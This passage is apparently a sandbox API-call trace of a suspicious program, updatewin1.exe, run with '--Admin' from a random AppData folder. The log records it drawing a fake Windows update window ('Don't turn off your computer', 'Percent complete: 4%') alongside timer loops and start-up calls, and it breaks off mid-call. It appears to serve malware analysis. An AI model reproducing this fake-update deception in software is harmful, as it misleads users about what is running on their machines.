0x0 [0060.699] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0060.699] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0060.699] TranslateMessage (lpMsg=0x18e548) returned 0 [0060.699] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0060.700] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0060.723] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0060.723] TranslateMessage (lpMsg=0x18e548) returned 0 [0060.723] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0060.723] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0060.723] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0060.723] TranslateMessage (lpMsg=0x18e548) returned 0 [0060.723] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0060.725] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0061.117] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0061.117] TranslateMessage (lpMsg=0x18e548) returned 0 [0061.117] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0061.117] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0061.117] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0061.117] TranslateMessage (lpMsg=0x18e548) returned 0 [0061.117] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0061.118] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0061.145] NtdllDefWindowProc_W () returned 0x0 [0061.145] NtdllDefWindowProc_W () returned 0x0 [0061.146] NtdllDefWindowProc_W () returned 0x1 [0061.146] TranslateAcceleratorW (hWnd=0xf011c, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0061.146] TranslateMessage (lpMsg=0x18e548) returned 0 [0061.146] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0061.146] BeginPaint (in: hWnd=0xf011c, lpPaint=0x18e2e0 | out: lpPaint=0x18e2e0) returned 0x3e010257 [0061.146] EndPaint (hWnd=0xf011c, lpPaint=0x18e2e0) returned 1 [0061.146] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0061.146] TranslateAcceleratorW (hWnd=0x401ae, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0061.146] TranslateMessage (lpMsg=0x18e548) returned 0 [0061.146] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0061.147] BeginPaint (in: hWnd=0x401ae, lpPaint=0x18d9c8 | out: lpPaint=0x18d9c8) returned 0x7010823 [0061.147] CreateSolidBrush (color=0x5b3ef) returned 0x22100250 [0061.147] FillRect (hDC=0x7010823, lprc=0x18d9b8, hbr=0x22100250) returned 1 [0061.147] DeleteObject (ho=0x22100250) returned 1 [0061.147] DrawIcon (hDC=0x7010823, X=7, Y=7, hIcon=0x601c5) returned 1 [0061.147] CreateFontW (cHeight=-19, cWidth=0, cEscapement=0, cOrientation=0, cWeight=500, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x0, iOutPrecision=0x0, iClipPrecision=0x0, iQuality=0x0, iPitchAndFamily=0x0, pszFaceName="Calibri") returned 0x270a085e [0061.147] SelectObject (hdc=0x7010823, h=0x270a085e) returned 0x18a002e [0061.147] SetBkMode (hdc=0x7010823, mode=1) returned 2 [0061.147] lstrlenW (lpString="Installing important updates Windows.") returned 37 [0061.147] TextOutW (hdc=0x7010823, x=55, y=10, lpString="Installing important updates Windows.", c=37) returned 1 [0061.147] SelectObject (hdc=0x7010823, h=0x18a002e) returned 0x270a085e [0061.147] CreateSolidBrush (color=0xffffff) returned 0x23100250 [0061.147] FillRect (hDC=0x7010823, lprc=0x18d9a8, hbr=0x23100250) returned 1 [0061.147] DeleteObject (ho=0x23100250) returned 1 [0061.147] CreateFontW (cHeight=-15, cWidth=0, cEscapement=0, cOrientation=0, cWeight=500, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x0, iOutPrecision=0x0, iClipPrecision=0x0, iQuality=0x0, iPitchAndFamily=0x0, pszFaceName="Calibri") returned 0xb0a083f [0061.148] SelectObject (hdc=0x7010823, h=0xb0a083f) returned 0x18a002e [0061.148] SetBkMode (hdc=0x7010823, mode=1) returned 1 [0061.148] lstrlenW (lpString="Getting your update ready.") returned 26 [0061.148] TextOutW (hdc=0x7010823, x=52, y=60, lpString="Getting your update ready.", c=26) returned 1 [0061.148] lstrlenW (lpString="Configuring update for Windows.") returned 31 [0061.148] TextOutW (hdc=0x7010823, x=52, y=77, lpString="Configuring update for Windows.", c=31) returned 1 [0061.148] lstrlenW (lpString="Don't turn off your computer or close it.") returned 41 [0061.148] TextOutW (hdc=0x7010823, x=52, y=94, lpString="Don't turn off your computer or close it.", c=41) returned 1 [0061.148] SelectObject (hdc=0x7010823, h=0x18a002e) returned 0xb0a083f [0061.148] CreateFontW (cHeight=-15, cWidth=0, cEscapement=0, cOrientation=0, cWeight=700, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x0, iOutPrecision=0x0, iClipPrecision=0x0, iQuality=0x0, iPitchAndFamily=0x0, pszFaceName="Calibri") returned 0x640a081e [0061.148] SelectObject (hdc=0x7010823, h=0x640a081e) returned 0x18a002e [0061.148] SetBkMode (hdc=0x7010823, mode=1) returned 1 [0061.149] SetTextAlign (hdc=0x7010823, align=0x6) returned 0x0 [0061.149] wsprintfW (in: param_1=0x18da08, param_2="Percent complete: %i%%" | out: param_1="Percent complete: 4%") returned 20 [0061.149] lstrlenW (lpString="Percent complete: 4%") returned 20 [0061.149] TextOutW (hdc=0x7010823, x=209, y=111, lpString="Percent complete: 4%", c=20) returned 1 [0061.149] SelectObject (hdc=0x7010823, h=0x18a002e) returned 0x640a081e [0061.149] EndPaint (hWnd=0x401ae, lpPaint=0x18d9c8) returned 1 [0061.149] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0061.149] TranslateAcceleratorW (hWnd=0x301aa, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0061.149] TranslateMessage (lpMsg=0x18e548) returned 0 [0061.149] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0061.150] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0061.150] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0061.150] TranslateMessage (lpMsg=0x18e548) returned 0 [0061.150] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0061.151] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0061.151] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0061.151] TranslateMessage (lpMsg=0x18e548) returned 0 [0061.151] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0061.151] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0062.125] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0062.125] TranslateMessage (lpMsg=0x18e548) returned 0 [0062.125] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0062.126] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0062.172] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0062.172] TranslateMessage (lpMsg=0x18e548) returned 0 [0062.172] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0062.172] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0062.172] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0062.172] TranslateMessage (lpMsg=0x18e548) returned 0 [0062.173] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0062.175] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0062.219] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0062.219] TranslateMessage (lpMsg=0x18e548) returned 0 [0062.219] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0062.219] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0062.219] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0062.219] TranslateMessage (lpMsg=0x18e548) returned 0 [0062.219] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0062.220] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0062.265] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0062.265] TranslateMessage (lpMsg=0x18e548) returned 0 [0062.266] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0062.266] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0062.266] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0062.266] TranslateMessage (lpMsg=0x18e548) returned 0 [0062.266] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0062.266] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0062.313] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0062.313] TranslateMessage (lpMsg=0x18e548) returned 0 [0062.313] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0062.313] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0062.313] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0062.313] TranslateMessage (lpMsg=0x18e548) returned 0 [0062.313] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0062.314] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0062.359] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0062.359] TranslateMessage (lpMsg=0x18e548) returned 0 [0062.359] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0062.359] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0062.359] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0062.359] TranslateMessage (lpMsg=0x18e548) returned 0 [0062.359] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0062.360] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0062.406] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0062.406] TranslateMessage (lpMsg=0x18e548) returned 0 [0062.406] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0062.406] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0062.406] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0062.406] TranslateMessage (lpMsg=0x18e548) returned 0 [0062.406] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0062.407] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0062.454] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0062.454] TranslateMessage (lpMsg=0x18e548) returned 0 [0062.454] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0062.454] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0062.454] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0062.454] TranslateMessage (lpMsg=0x18e548) returned 0 [0062.454] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0062.457] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0062.500] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0062.500] TranslateMessage (lpMsg=0x18e548) returned 0 [0062.500] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0062.500] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0062.500] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0062.500] TranslateMessage (lpMsg=0x18e548) returned 0 [0062.500] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0062.501] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0062.553] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0062.553] TranslateMessage (lpMsg=0x18e548) returned 0 [0062.553] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0062.553] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0062.553] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0062.553] TranslateMessage (lpMsg=0x18e548) returned 0 [0062.553] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0062.554] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0062.596] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0062.596] TranslateMessage (lpMsg=0x18e548) returned 0 [0062.596] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0062.596] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0062.596] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0062.596] TranslateMessage (lpMsg=0x18e548) returned 0 [0062.596] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0062.597] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0062.640] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0062.640] TranslateMessage (lpMsg=0x18e548) returned 0 [0062.640] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0062.640] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0062.640] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0062.640] TranslateMessage (lpMsg=0x18e548) returned 0 [0062.640] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0062.641] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0062.687] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0062.687] TranslateMessage (lpMsg=0x18e548) returned 0 [0062.687] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0062.687] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0062.687] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0062.687] TranslateMessage (lpMsg=0x18e548) returned 0 [0062.687] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0062.688] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0062.768] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0062.768] TranslateMessage (lpMsg=0x18e548) returned 0 [0062.768] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0062.768] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0063.810] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0063.810] TranslateMessage (lpMsg=0x18e548) returned 0 [0063.810] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0063.810] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0063.853] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0063.853] TranslateMessage (lpMsg=0x18e548) returned 0 [0063.853] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0063.853] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0063.853] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0063.853] TranslateMessage (lpMsg=0x18e548) returned 0 [0063.853] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0063.854] GetMessageW (lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0) [0063.889] NtdllDefWindowProc_W () returned 0x1 [0063.889] NtdllDefWindowProc_W () returned 0x1 [0063.889] NtdllDefWindowProc_W () returned 0x0 [0063.890] NtdllDefWindowProc_W () returned 0x0 [0063.891] NtdllDefWindowProc_W () returned 0x0 [0063.891] NtdllDefWindowProc_W () returned 0x1 [0063.898] NtdllDefWindowProc_W () returned 0x0 [0063.898] NtdllDefWindowProc_W () returned 0x0 [0063.899] NtdllDefWindowProc_W () returned 0x0 [0063.899] NtdllDefWindowProc_W () returned 0x0 [0063.899] NtdllDefWindowProc_W () returned 0x2 [0063.899] NtdllDefWindowProc_W () returned 0x0 Thread: id = 58 os_tid = 0xa28 [0045.824] timeGetTime () returned 0x1145052 [0045.824] timeGetTime () returned 0x1145052 [0045.824] Sleep (dwMilliseconds=0x3e8) [0046.900] timeGetTime () returned 0x1145448 [0046.900] timeGetTime () returned 0x1145448 [0046.900] Sleep (dwMilliseconds=0x3e8) [0048.179] timeGetTime () returned 0x114583e [0048.179] timeGetTime () returned 0x114583e [0048.179] Sleep (dwMilliseconds=0x3e8) [0049.396] timeGetTime () returned 0x1145c34 [0049.396] timeGetTime () returned 0x1145c34 [0049.396] Sleep (dwMilliseconds=0x3e8) [0050.410] timeGetTime () returned 0x114602a [0050.410] timeGetTime () returned 0x114602a [0050.410] Sleep (dwMilliseconds=0x3e8) [0051.470] timeGetTime () returned 0x1146420 [0051.470] timeGetTime () returned 0x1146420 [0051.470] Sleep (dwMilliseconds=0x3e8) [0053.732] timeGetTime () returned 0x1146816 [0053.732] timeGetTime () returned 0x1146816 [0053.732] Sleep (dwMilliseconds=0x3e8) [0054.803] timeGetTime () returned 0x1146c3b [0054.803] timeGetTime () returned 0x1146c3b [0054.803] Sleep (dwMilliseconds=0x3e8) [0055.807] timeGetTime () returned 0x1147031 [0055.807] timeGetTime () returned 0x1147031 [0055.807] Sleep (dwMilliseconds=0x3e8) [0059.436] timeGetTime () returned 0x1147db8 [0059.437] timeGetTime () returned 0x1147db8 [0059.440] Sleep (dwMilliseconds=0x3e8) [0060.701] timeGetTime () returned 0x11482a8 [0060.701] timeGetTime () returned 0x11482a8 [0060.701] Sleep (dwMilliseconds=0x3e8) [0061.704] timeGetTime () returned 0x114869e [0061.704] timeGetTime () returned 0x114869e [0061.704] Sleep (dwMilliseconds=0x3e8) [0062.718] timeGetTime () returned 0x1148a94 [0062.718] timeGetTime () returned 0x1148a94 [0062.718] Sleep (dwMilliseconds=0x3e8) [0063.827] timeGetTime () returned 0x1148e7c [0063.827] timeGetTime () returned 0x1148e7c [0063.827] Sleep (dwMilliseconds=0x3e8) Process: id = "9" image_name = "updatewin1.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc\\updatewin1.exe" page_root = "0x4dab0000" os_pid = "0xa14" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "6" os_parent_pid = "0x9e8" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc\\updatewin1.exe\" --Admin" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 56 os_tid = 0xa18 [0045.144] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff7c | out: lpSystemTimeAsFileTime=0x18ff7c*(dwLowDateTime=0x19678b90, dwHighDateTime=0x1d5956a)) [0045.373] GetCurrentProcessId () returned 0xa14 [0045.373] GetCurrentThreadId () returned 0xa18 [0045.373] GetTickCount () returned 0x1144e8e [0045.373] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff74 | out: lpPerformanceCount=0x18ff74*=16553614999) returned 1 [0045.373] GetStartupInfoA (in: lpStartupInfo=0x18ff20 | out: lpStartupInfo=0x18ff20*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc\\updatewin1.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0045.373] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x5a0000 [0045.374] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0045.374] GetProcAddress (hModule=0x76c20000, lpProcName="FlsAlloc") returned 0x76c34f2b [0045.374] GetProcAddress (hModule=0x76c20000, lpProcName="FlsGetValue") returned 0x76c31252 [0045.374] GetProcAddress (hModule=0x76c20000, lpProcName="FlsSetValue") returned 0x76c34208 [0045.374] GetProcAddress (hModule=0x76c20000, lpProcName="FlsFree") returned 0x76c3359f [0045.374] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0045.374] GetProcAddress (hModule=0x76c20000, lpProcName="EncodePointer") returned 0x77170fcb [0045.375] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0045.375] GetProcAddress (hModule=0x76c20000, lpProcName="EncodePointer") returned 0x77170fcb [0045.375] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0045.375] GetProcAddress (hModule=0x76c20000, lpProcName="EncodePointer") returned 0x77170fcb [0045.375] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0045.375] GetProcAddress (hModule=0x76c20000, lpProcName="EncodePointer") returned 0x77170fcb [0045.375] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0045.375] GetProcAddress (hModule=0x76c20000, lpProcName="EncodePointer") returned 0x77170fcb [0045.375] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0045.375] GetProcAddress (hModule=0x76c20000, lpProcName="EncodePointer") returned 0x77170fcb [0045.375] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0045.375] GetProcAddress (hModule=0x76c20000, lpProcName="EncodePointer") returned 0x77170fcb [0045.376] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0045.376] GetProcAddress (hModule=0x76c20000, lpProcName="DecodePointer") returned 0x77169d35 [0045.376] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x214) returned 0x5a07d0 [0045.376] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0045.376] GetProcAddress (hModule=0x76c20000, lpProcName="DecodePointer") returned 0x77169d35 [0045.376] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0045.376] GetProcAddress (hModule=0x76c20000, lpProcName="EncodePointer") returned 0x77170fcb [0045.376] GetProcAddress (hModule=0x76c20000, lpProcName="DecodePointer") returned 0x77169d35 [0045.376] GetCurrentThreadId () returned 0xa18 [0045.376] GetStartupInfoA (in: lpStartupInfo=0x18fea4 | out: lpStartupInfo=0x18fea4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc\\updatewin1.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0045.376] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x800) returned 0x5a09f0 [0045.377] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0045.377] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0045.377] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0045.377] SetHandleCount (uNumber=0x20) returned 0x20 [0045.377] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc\\updatewin1.exe\" --Admin" [0045.377] GetEnvironmentStringsW () returned 0x314e78* [0045.377] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1381 [0045.377] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x565) returned 0x5a11f8 [0045.377] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x5a11f8, cbMultiByte=1381, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 